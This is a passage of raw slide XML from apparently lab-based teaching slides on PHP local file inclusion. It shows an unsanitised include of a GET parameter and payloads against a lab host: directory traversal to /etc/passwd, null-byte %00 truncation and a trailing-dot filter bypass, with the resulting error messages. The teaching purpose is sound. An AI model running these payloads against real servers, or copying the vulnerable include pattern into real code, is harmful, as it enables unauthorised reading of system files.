          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1569493" y="518615"/>
            <a:ext cx="5663820" cy="9689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dirty="0"/>
              <a:t>&lt;?PHP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	include("languages/". $_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>']); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="486600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 We discussed a couple of techniques to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the filter within the include function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>In the first two cases, we checked the code for the web app, and then we knew how to exploit it. However, in this case, we are performing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>black box testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, in which we don't have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. In this case,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> errors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>are significant in understanding how the data is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>passed and processed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>into the web app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>In this scenario, we have the following entry point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://webapp.thm/index.php?lang=EN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. If we enter an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invalid input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, we get the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>The error message discloses significant information. By entering THM as input, an error message shows what the include function looks like:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include(languages/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THM.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>If you look at the directory closely, we can tell the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function includes files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>in the languages directory is adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> at the end of the entry. Thus the valid input will be something as follows:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.php?lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=EN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, where the file EN is located inside the given languages directory and named  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>EN.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Also, the error message disclosed another important piece of information about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>full web application directory path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/www/html/THM-4/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2470246"/>
            <a:ext cx="12192000" cy="846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b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Warning: include(languages/THM.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3890170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dirty="0"/>
              <a:t>To exploit this, we need to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>trick, as described in the directory traversal section, to get out the current folder. Let's try the following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://webapp.thm/index.php?lang=../../../../etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Note that we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>used 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> because we know the path has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>four levels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/www/html/THM-4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>But we still receive the following error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It seems we could move out of the PHP directory but still, the include function reads the input with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> at the end! This tells us that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the developer specifies the file type to pass to the include function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. To bypass this scenario, we can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL BYTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Using null bytes is an injection technique where URL-encoded representation such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%00 or 0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> in hex with user-supplied data to terminate strings. You could think of it as trying to trick the web app into disregarding whatever comes after the Null Byte.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>adding the Null Byte at the end of the payload, we tell the  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include function to ignore anything after the null byte which may look like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>include("languages/../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>/passwd%00").".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>"); which equivalent to → include("languages/../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2060812"/>
            <a:ext cx="121920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Warning: include(languages/../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>passwd.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>): failed to open stream: No such file or directory in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/www/html/THM-4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> on line 12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3312783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1800" b="1" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> In this section, the developer decided to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filter keywords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>to avoid disclosing sensitive information! The /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> file is being filtered. There are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>two possible methods </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>to bypass the filter. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, by using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NullByte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> %00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>or the current directory trick at the end of the filtered keyword </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>The exploit will be similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://webapp.thm/index.php?lang=/etc/passwd/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>. We could also use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://webapp.thm/index.php?lang=/etc/passwd%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>To make it clearer, if we try this concept in the file system using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd ..,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> it will get you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>back one step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>; however, if you do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>cd .,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> It stays in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>current directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>.  Similarly, if we try  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/..,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> it results to be  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> and that's because we moved one to the root.  Now if we try  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/.,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> the result will be  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
